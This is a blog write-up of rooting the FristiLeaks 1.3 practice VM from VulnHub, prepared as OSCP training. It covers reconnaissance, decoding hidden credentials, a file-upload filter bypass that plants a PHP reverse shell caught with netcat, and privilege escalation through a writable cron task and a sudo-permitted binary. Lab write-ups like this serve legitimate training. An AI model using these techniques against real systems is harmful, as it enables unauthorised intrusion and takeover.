[VULNHUB] FristiLeaks: 1.3

Second VM of my OSCP series. It is really really awesome.

DIRECTORY NAME TOO MUCH GUESSABLE

Start with an nmap scan:

nmap 192.168.1.23 -sV -p 1-65535 -T 4

This is the result:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 12:45 CET
Nmap scan report for 192.168.1.23
Host is up (0.012s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.59 seconds

So there is only a web server running on port 80. Now let’s scan the service with nikto:

nikto -h 192.168.1.23

This is the output:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.23
+ Target Hostname:    192.168.1.23
+ Target Port:        80
+ Start Time:         2016-11-24 12:45:40 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 19:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8348 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2016-11-24 12:46:36 (GMT1) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So there are a few entries in /robots.txt that I need to check. The home page of the web site it’s a welcome page of the VM. So I opened the robots.txt file:

User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer

I checked these three directories but there was, for every of them, an image which says that it was’nt the directory that I was searching. I tried some bruteforce attack for directory discovering without success, then I tried some guessing names and /fristi worked! A login form appeared and I checked the source code where I found this comment:

TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

Also there was a meta tag with the following phrase:

super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.

Ok, there are some informations to discover here. Looking better into the source code I found that:

iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

Let’s decode that. First of all I saved the string into a file called base64_password then I had to remove the newline from it so I typed:

cat base64_password | tr -d '\n' > decoded_password

I don’t know which type of file I decoded, if it was a text or an image so I checked it with that:

file decoded_password

This is the output:

decoded_password: PNG image data, 365 x 75, 8-bit/color RGB, non-interlaced

Nice, now rename it adding the .png extension. This is the content of the image:

keKkeKKeKKeKkEkkEk

So I have the password but I need an username. I remembered that the comment in the HTML page was signed by an user which is eezeepz. So I tried to log in with these credentials and it worked. Then I clicked into the only link in the page which redirected me to an upload form.

FIX THIS UPLOAD FORM

Only images were allowed. So I used Burp Suite to upload a .php reverse shell and I changed the extension to .php.gif and I edited the Content-Type to image/gif and finally I added the GIF89a; header. That was the output of the upload form:

Uploading, please wait
The file has been uploaded to /uploads

So I started listen locally:

nc -lvp 1234

And then I browsed to http://192.168.1.23/fristi/uploads/php-reverse-shell.php.gif. Now I have a reverse shell and I need to elevate my privileges to become root.

FRISTI, I PWN YOU!

First of all I ran the command id to check who I was (apache user), then I started to look around me. Browsing into /var/www I found notes.txt:

hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.

-jerry

Then I changed directory to /home and I discovered three users:
– admin
– eezeepz
– fristigod

I could read only the eezeepz home folder and so I listed the file inside it:

drwx---r-x. 5 eezeepz eezeepz  12K Nov 18  2015 .
drwxr-xr-x. 5 root    root    4.0K Nov 19  2015 ..
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .Old
-rw-r--r--. 1 eezeepz eezeepz   18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz  176 Sep 22  2015 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz  124 Sep 22  2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz  24K Nov 17  2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz  33K Nov 17  2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6.9K Nov 17  2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz  56K Nov 17  2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz  25K Nov 17  2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz  52K Nov 17  2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz  32K Nov 17  2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz  48K Nov 17  2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz  53K Nov 17  2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz  44K Nov 17  2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4.7K Nov 17  2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 127K Nov 17  2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz  38K Nov 17  2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5.3K Nov 17  2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz  41K Nov 17  2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz  15K Nov 17  2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz  44K Nov 17  2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7.8K Nov 17  2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz  17K Nov 17  2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz  33K Nov 17  2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 168K Nov 17  2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5.4K Nov 17  2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 121K Nov 17  2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz  25K Nov 17  2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4.7K Nov 17  2015 nologin
-r--r--r--. 1 eezeepz eezeepz  514 Nov 18  2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 382K Nov 17  2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 244K Nov 17  2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz  51K Nov 17  2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz  47K Nov 17  2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz  13K Nov 17  2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz  21K Nov 17  2015 true
-rwxr-xr-x. 1 eezeepz eezeepz  35K Nov 17  2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz  16K Nov 17  2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 493K Nov 17  2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz   62 Nov 17  2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz  47K Nov 17  2015 zic

There was a notes.txt so I red it:

Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

Nice! The chmod binary was present into /home/admin so I typed:

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis

After a minute I got the access to the admin folder, so I changed directory to it and I listed the files again:

-rwxr-xr-x 1 admin     admin      45224 Nov 18  2015 cat
-rwxr-xr-x 1 admin     admin      48712 Nov 18  2015 chmod
-rw-r--r-- 1 admin     admin        737 Nov 18  2015 cronjob.py
-rw-r--r-- 1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rw-r--r-- 1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxr-xr-x 1 admin     admin      90544 Nov 18  2015 df
-rwxr-xr-x 1 admin     admin      24136 Nov 18  2015 echo
-rwxr-xr-x 1 admin     admin     163600 Nov 18  2015 egrep
-rwxr-xr-x 1 admin     admin     163600 Nov 18  2015 grep
-rwxr-xr-x 1 admin     admin      85304 Nov 18  2015 ps
-rw-rw-rw- 1 apache    apache        35 Nov 23 14:32 runthis
-rw-r--r-- 1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt

There was a lot of interesting file. I printed them into the terminal, that is cryptedpass.txt:

mVGZ3O3omkJLmy2pcuTq

That is cryptpass.py

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

And then whoisyourgodnow.txt:

=RFn0AKnlMHMPIzpyuTI0ITG

Analyzing the python script I can see that the input string it’s first of all encoded in base64, then it is reversed and finally it is encoded with ROT13 algorithm. So I opened the python interpreter into my terminal and I typed:

import codecs
str = 'mVGZ3O3omkJLmy2pcuTq'
str = codecs.decode(str, 'rot13')
str = str[::-1]
str = codecs.decode(str, 'base64')
print str

That was the output:

thisisalsopw123

I made the same with the second encoded string and I got:

LetThereBeFristi!

Ok, so I tried to change user to fristigod but I received the following error:

standard in must be a tty

So I need a TTY shell. I used python to achieve this:

python -c 'import pty; pty.spawn("/bin/bash")'

Then I changed the user with:

su fristigod

And I used LetThereBeFristi! as password and it worked. Now I looked for sudo program that could be ran by the user:

sudo -l

And I discovered that:

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

Seems that there is an hidden directory with a strange binary. I changed directory to /var/fristigod and I listed the files:

-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  3 fristigod fristigod 4.0K Nov 23 14:55 .secret_admin_stuff

Let’s take a look into .bash_history:

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

Ok, seems that doCom execute command as root but I need to run it with user fristi. So I browsed into the .secret_admin_stuff directory and I typed:

sudo -u fristi ./doCom chmod -R 777 /root

I used LetThereBeFristi! as sudo password. Now I have the full access of the /root directory. I browsed into it, I listed the files and I printed to terminal fristileaks_secrets.txt:

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

VM rooted and completed!

Advertisements
[VULNHUB] FristiLeaks: 1.3

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s